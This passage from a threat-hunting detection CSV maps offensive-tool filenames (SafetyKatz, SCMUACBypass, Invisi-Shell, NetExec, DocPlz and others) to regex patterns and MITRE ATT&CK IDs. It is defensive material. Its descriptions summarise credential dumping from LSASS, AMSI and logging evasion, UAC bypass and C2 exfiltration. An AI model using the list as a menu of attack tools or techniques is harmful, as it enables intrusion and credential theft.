tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" 
"*\RunWithPathAsAdmin.bat*",".{0,1000}\\RunWithPathAsAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*\RunWithRegistryNonAdmin.bat*",".{0,1000}\\RunWithRegistryNonAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*\rusthound.exe*",".{0,1000}\\rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*\RustRedOps\*",".{0,1000}\\RustRedOps\\.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*\RustRedOps-main*",".{0,1000}\\RustRedOps\-main.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\SafetyKatz*",".{0,1000}\\SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\sAINT-master.zip*",".{0,1000}\\sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\SAM\.Sam-Full.txt*",".{0,1000}\\SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\samantha.txt",".{0,1000}\\samantha\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*\sample_brc4.json*",".{0,1000}\\sample_brc4\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" 
"*\sample_sliver.json*",".{0,1000}\\sample_sliver\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\SauronEye.exe*",".{0,1000}\\SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\save_reg.hive*",".{0,1000}\\save_reg\.hive.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*\scan4all.exe*",".{0,1000}\\scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*\scan4all-main*",".{0,1000}\\scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*\scanACLsResults.csv*",".{0,1000}\\scanACLsResults\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*\ScanInterception.ps1*",".{0,1000}\\ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\scan-network.py*",".{0,1000}\\scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\SchTaskBackdoor.*",".{0,1000}\\SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*\sc-loader.exe*",".{0,1000}\\sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*\scmuacbypass.cpp*",".{0,1000}\\scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\scmuacbypass.exe*",".{0,1000}\\scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" 
"*\SCMUACBypass\*",".{0,1000}\\SCMUACBypass\\.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\ScriptSentry.ps1*",".{0,1000}\\ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\ScriptSentry.psd1*",".{0,1000}\\ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\ScriptSentry.psm1*",".{0,1000}\\ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\ScriptSentry.txt*",".{0,1000}\\ScriptSentry\.txt.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\scuffy.py*",".{0,1000}\\scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 
- T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\sdb-explorer.exe*",".{0,1000}\\sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*\sdb-explorer.sln*",".{0,1000}\\sdb\-explorer\.sln.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*\SeatBelt.exe*",".{0,1000}\\SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Seatbelt.sln*",".{0,1000}\\Seatbelt\.sln.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\Seatbelt.txt*",".{0,1000}\\Seatbelt\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Seatbelt\Commands\*",".{0,1000}\\Seatbelt\\Commands\\.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\Seatbelt\Program.cs*",".{0,1000}\\Seatbelt\\Program\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\Seatbelt\Seatbelt.cs*",".{0,1000}\\Seatbelt\\Seatbelt\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\SelectMyParent.exe*",".{0,1000}\\SelectMyParent\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\SelectObjectCommand.cs",".{0,1000}\\SelectObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\self_deletion.exe*",".{0,1000}\\self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\sendkeys.ps1*",".{0,1000}\\sendkeys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ServerC2.cpp*",".{0,1000}\\ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\ServerC2.exe*",".{0,1000}\\ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - 
T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\ServerC2\ServerC2.*",".{0,1000}\\ServerC2\\ServerC2\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\servers\dns_server.py*",".{0,1000}\\servers\\dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\servers\icmp_server.py*",".{0,1000}\\servers\\icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\servers\smb_server.py*",".{0,1000}\\servers\\smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration 
simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\services\p2p\p2p.go*",".{0,1000}\\services\\p2p\\p2p\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\Sessions\SH-MatchedGroups-*.txt*",".{0,1000}\\Sessions\\SH\-MatchedGroups\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\SessionSearcher.csproj*",".{0,1000}\\SessionSearcher\.csproj.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\SessionSearcher.exe*",".{0,1000}\\SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\SetClipboardCommand.cs",".{0,1000}\\SetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\SetNTLM.ps1*",".{0,1000}\\SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
